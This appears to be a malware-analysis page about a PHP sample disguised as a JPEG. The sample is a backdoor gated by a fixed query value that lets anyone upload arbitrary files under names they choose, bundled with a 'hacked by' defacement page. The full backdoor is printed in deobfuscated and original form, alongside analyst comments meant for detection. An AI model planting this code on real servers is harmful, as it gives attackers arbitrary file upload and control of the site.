PHP Malware Analysis

cok.html

md5: 1db99bc85b61c3794f22a2742f0a2db4

Screenshot


Attributes

Environment

Files

Input

Title
  • ======ND4SMU======hacked by Korban PPKM (<a href="#deobfuscated">Deobfuscated</a>, <a href="#original-code">Original</a>)</li><li>======ND4SMU======hacked by Korban PPKM (<a href="#generated-html">HTML</a>)</li></ul><br><b>URLs</b><br><ul><li>https://fonts.googleapis.com/css?family=Inconsolata& (<a href="#generated-html">HTML</a>)</li><li>https://fonts.googleapis.com/css?family=Inconsolata&display=swap (<a href="#deobfuscated">Deobfuscated</a>, <a href="#original-code">Original</a>)</li><li>https://fonts.googleapis.com/css?family=Sriracha|Ranga|Allan|Architects (<a href="#generated-html">HTML</a>)</li><li>https://g.top4top.io/p_2057ad9lz0.jpg (<a href="#deobfuscated">Deobfuscated</a>, <a href="#generated-html">HTML</a>, <a href="#original-code">Original</a>)</li><li>https://i.postimg.cc/wMDjmbym/siyahyuruyen.gif (<a href="#deobfuscated">Deobfuscated</a>, <a href="#generated-html">HTML</a>, <a href="#original-code">Original</a>)</li><li>https://l.top4top.io/m_207098prh0.mp3 (<a href="#deobfuscated">Deobfuscated</a>, <a href="#generated-html">HTML</a>, <a href="#original-code">Original</a>)</li><li>https://l.top4top.io/m_2070dv1se0.mp3 (<a href="#deobfuscated">Deobfuscated</a>, <a href="#generated-html">HTML</a>, <a href="#original-code">Original</a>)</li></ul><br><hr><h2 id="deobfuscated">Deobfuscated PHP code</h2><pre><code class="language-php">ÿØÿà JFIF    ÿþ/<?php /* Analyst note: this PHP block sits between JPEG/JFIF marker bytes and is followed by a static defacement page, so the file begins like an image while still carrying server-side code; a check that inspects only the leading bytes would see an image (presumably the intent). The code only runs if the server hands the file to the PHP interpreter. */ error_reporting(0); /* Analyst note: error reporting is switched off for the request, so the notices raised when "why" or the upload fields are absent are not reported. */ if ($_GET["why"] == "bwi") { /* Analyst note: the only gate is a fixed query-string value compared with loose ==; no session, credential or origin check is visible. Requests carrying this parameter are a useful access-log indicator. */ $saw1 = $_FILES["file"]["tmp_name"]; $saw2 = $_FILES["file"]["name"]; /* Analyst note: $saw2 is the file name supplied by the client. */ echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; /* Analyst note: the form has no action attribute, so it posts back to the same URL, query string included. */ move_uploaded_file($saw1, $saw2); /* Analyst note: the upload is stored under the client-supplied name with no extension, type or size check, and the return value is ignored; the destination is a relative path, typically resolved against the script's directory. When triaging, list files created next to this one after its first appearance. */ die(0); /* Analyst note: execution stops here, so the defacement markup after the PHP block is not sent on this path. */ } ?>ÿÛ C ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÛ CÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÀ   " ÿÄ   ÿÄ  ÿÄ  ÿÄ  ÿÚ   ? 
˜ ÿÙ<html><head><title>======ND4SMU======</title></head></html><title>hacked by Korban PPKM</title><link href="https://fonts.googleapis.com/css?family=Inconsolata&display=swap"rel="stylesheet"><meta content="ISD-TEAM"name="description"><meta content="ISD-TEAM"name="keywords"><meta content="index,cache"http-equiv="cache-control"><meta content="index,cache"http-equiv="pragma"><meta content="black"name="theme-color"><center><body bgcolor="black"><div style="height: auto; min-height: 80%;"><div style="text-align: center; width:800px; margin-left: -400px; position: absolute; top: 20%; left: 50%;"><body bgcolor="black"><img src="https://g.top4top.io/p_2057ad9lz0.jpg"width="500"><br><font color="white"face="Inconsolata"size="6"><font color="red">======={{[[</font> hacked by Korban PPKM <font color="red">]]}}=======</font><br><font size="4"><br><br><font color="red">C0k_J4r4N</font><br><img src="https://i.postimg.cc/wMDjmbym/siyahyuruyen.gif"width="70%"><br><audio autoplay><source src="https://l.top4top.io/m_207098prh0.mp3"type="audio/mpeg"></audio><audio loop><source src="https://l.top4top.io/m_2070dv1se0.mp3"type="audio/mpeg"></audio><script><!-- document.write(unescape('%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%66%6F%6E%74%73%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%63%73%73%3F%66%61%6D%69%6C%79%3D%53%72%69%72%61%63%68%61%7C%52%61%6E%67%61%7C%41%6C%6C%61%6E%7C%41%72%63%68%69%74%65%63%74%73%20%44%61%75%67%68%74%65%72%7C%54%65%6B%6F%7C%42%75%62%62%6C%65%67%75%6D%20%53%61%6E%73%7C%4E%65%77%20%52%6F%63%6B%65%72%7C%50%61%74%72%69%63%6B%20%48%61%6E%64%7C%4A%6F%6C%6C%79%20%4C%6F%64%67%65%72%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%3E')); //--></script></font></font></body><br><br><br></div></div></body></center></code></pre><hr><h2 id="execution_traces">Execution traces</h2><hr><h2 id="generated-html">Generated HTML code</h2><pre><code class="language-html"><html><head></head><body bgcolor="black">ÿØÿÃ&nbsp; JFIF    ÿþ/<!--?php goto 
hElwX; hElwX: error_reporting(0); goto iqskR; iqskR: if ($_GET["\167\x68\171"] == "\x62\167\x69") { $saw1 = $_FILES["\146\151\x6c\145"]["\164\x6d\x70\137\x6e\x61\155\x65"]; $saw2 = $_FILES["\x66\151\154\145"]["\156\x61\155\x65"]; echo "\x3c\146\x6f\x72\x6d\40\x6d\145\164\x68\157\x64\75\x27\x50\117\123\x54\x27\40\x65\x6e\x63\x74\x79\x70\145\75\47\155\x75\x6c\x74\x69\160\x61\x72\164\x2f\x66\157\162\x6d\x2d\x64\x61\x74\141\x27\76\x3c\x69\x6e\160\x75\x74\x20\164\x79\x70\x65\75\47\x66\151\x6c\145\x27\40\x6e\x61\155\145\75\47\x66\x69\154\x65\47\x20\57\76\74\x69\156\x70\165\164\40\164\171\x70\145\75\x27\163\165\142\x6d\x69\x74\47\40\x76\141\x6c\165\145\x3d\47\125\120\x6c\157\141\x64\x27\40\57\x3e\74\x2f\x66\157\162\155\x3e"; move_uploaded_file($saw1, $saw2); die(0); } goto tjd38; tjd38: ?-->ÿÛ C ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÛ CÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÀ   " ÿÄ   ÿÄ  ÿÄ  ÿÄ  ÿÚ   ? Ëœ ÿÙ<title>======ND4SMU======</title><title>hacked by Korban PPKM</title><link href="https://fonts.googleapis.com/css?family=Inconsolata&amp;display=swap" rel="stylesheet"><meta content="ISD-TEAM" name="description"><meta content="ISD-TEAM" name="keywords"><meta content="index,cache" http-equiv="cache-control"><meta content="index,cache" http-equiv="pragma"><meta content="black" name="theme-color"><center><div style="height: auto; min-height: 80%;"><div style="text-align: center; width:800px; margin-left: -400px; position: absolute; top: 20%; left: 50%;"><img src="https://g.top4top.io/p_2057ad9lz0.jpg" width="500"><br><font color="white" face="Inconsolata" size="6"><font color="red">======={{[[</font> hacked by Korban PPKM <font color="red">]]}}=======</font><br><font size="4"><br><br><font color="red">C0k_J4r4N</font><br><img src="https://i.postimg.cc/wMDjmbym/siyahyuruyen.gif" width="70%"><br><audio autoplay=""><source src="https://l.top4top.io/m_207098prh0.mp3" type="audio/mpeg"></audio><audio loop=""><source 
src="https://l.top4top.io/m_2070dv1se0.mp3" type="audio/mpeg"></audio><script><!-- document.write(unescape('%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%66%6F%6E%74%73%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%63%73%73%3F%66%61%6D%69%6C%79%3D%53%72%69%72%61%63%68%61%7C%52%61%6E%67%61%7C%41%6C%6C%61%6E%7C%41%72%63%68%69%74%65%63%74%73%20%44%61%75%67%68%74%65%72%7C%54%65%6B%6F%7C%42%75%62%62%6C%65%67%75%6D%20%53%61%6E%73%7C%4E%65%77%20%52%6F%63%6B%65%72%7C%50%61%74%72%69%63%6B%20%48%61%6E%64%7C%4A%6F%6C%6C%79%20%4C%6F%64%67%65%72%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%3E')); //--></script><link href="https://fonts.googleapis.com/css?family=Sriracha|Ranga|Allan|Architects Daughter|Teko|Bubblegum Sans|New Rocker|Patrick Hand|Jolly Lodger" rel="stylesheet"></font></font><br><br><br></div></div></center></body></html></code></pre><hr><h2 id="original-code">Original PHP code</h2><pre><code class="language-php">ÿØÿà JFIF    ÿþ/<?php /* Analyst note (not part of the sample): the goto labels hElwX, iqskR and tjd38 are visited in source order, so they add no logic and only break up the statement sequence. The double-quoted strings mix octal and hex escapes; they decode to "why", "bwi", "file", "tmp_name", "name" and the upload form shown in the deobfuscated listing. Searching for the plain-text words will miss this form of the sample, while move_uploaded_file and the superglobal names stay readable. */ goto hElwX; hElwX: error_reporting(0); goto iqskR; iqskR: if ($_GET["\167\x68\171"] == "\x62\167\x69") { $saw1 = $_FILES["\146\151\x6c\145"]["\164\x6d\x70\137\x6e\x61\155\x65"]; $saw2 = $_FILES["\x66\151\154\145"]["\156\x61\155\x65"]; echo "\x3c\146\x6f\x72\x6d\40\x6d\145\164\x68\157\x64\75\x27\x50\117\123\x54\x27\40\x65\x6e\x63\x74\x79\x70\145\75\47\155\x75\x6c\x74\x69\160\x61\x72\164\x2f\x66\157\162\x6d\x2d\x64\x61\x74\141\x27\76\x3c\x69\x6e\160\x75\x74\x20\164\x79\x70\x65\75\47\x66\151\x6c\145\x27\40\x6e\x61\155\145\75\47\x66\x69\154\x65\47\x20\57\76\74\x69\156\x70\165\164\40\164\171\x70\145\75\x27\163\165\142\x6d\x69\x74\47\40\x76\141\x6c\165\145\x3d\47\125\120\x6c\157\141\x64\x27\40\57\x3e\74\x2f\x66\157\162\155\x3e"; move_uploaded_file($saw1, $saw2); /* Analyst note (not part of the sample): the destination is the client-supplied file name taken from $_FILES, used without any extension or type check. */ die(0); } goto tjd38; tjd38: ?>ÿÛ C ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÛ CÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÀ   " ÿÄ   ÿÄ  ÿÄ  ÿÄ  ÿÚ   ? 
˜ ÿÙ<html><head><title>======ND4SMU======</title></head></html><title>hacked by Korban PPKM</title><link href="https://fonts.googleapis.com/css?family=Inconsolata&display=swap"rel="stylesheet"><meta content="ISD-TEAM"name="description"><meta content="ISD-TEAM"name="keywords"><meta content="index,cache"http-equiv="cache-control"><meta content="index,cache"http-equiv="pragma"><meta content="black"name="theme-color"><center><body bgcolor="black"><div style="height: auto; min-height: 80%;"><div style="text-align: center; width:800px; margin-left: -400px; position: absolute; top: 20%; left: 50%;"><body bgcolor="black"><img src="https://g.top4top.io/p_2057ad9lz0.jpg"width="500"><br><font color="white"face="Inconsolata"size="6"><font color="red">======={{[[</font> hacked by Korban PPKM <font color="red">]]}}=======</font><br><font size="4"><br><br><font color="red">C0k_J4r4N</font><br><img src="https://i.postimg.cc/wMDjmbym/siyahyuruyen.gif"width="70%"><br><audio autoplay><source src="https://l.top4top.io/m_207098prh0.mp3"type="audio/mpeg"></audio><audio loop><source src="https://l.top4top.io/m_2070dv1se0.mp3"type="audio/mpeg"></audio><script><!-- document.write(unescape('%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%66%6F%6E%74%73%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%63%73%73%3F%66%61%6D%69%6C%79%3D%53%72%69%72%61%63%68%61%7C%52%61%6E%67%61%7C%41%6C%6C%61%6E%7C%41%72%63%68%69%74%65%63%74%73%20%44%61%75%67%68%74%65%72%7C%54%65%6B%6F%7C%42%75%62%62%6C%65%67%75%6D%20%53%61%6E%73%7C%4E%65%77%20%52%6F%63%6B%65%72%7C%50%61%74%72%69%63%6B%20%48%61%6E%64%7C%4A%6F%6C%6C%79%20%4C%6F%64%67%65%72%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%3E')); //--></script></font></font></body><br><br><br></div></div></body></center></code></pre></div> <!-- /Malware content --> </div> </div> <!-- /.row --> <!-- Footer --> <footer> <div class="row"> <div class="col-lg-12"> <p>Copyright © Beneri 2024</p> </div> </div> <!-- /.row --> </footer> </div> <!-- 
/.container -->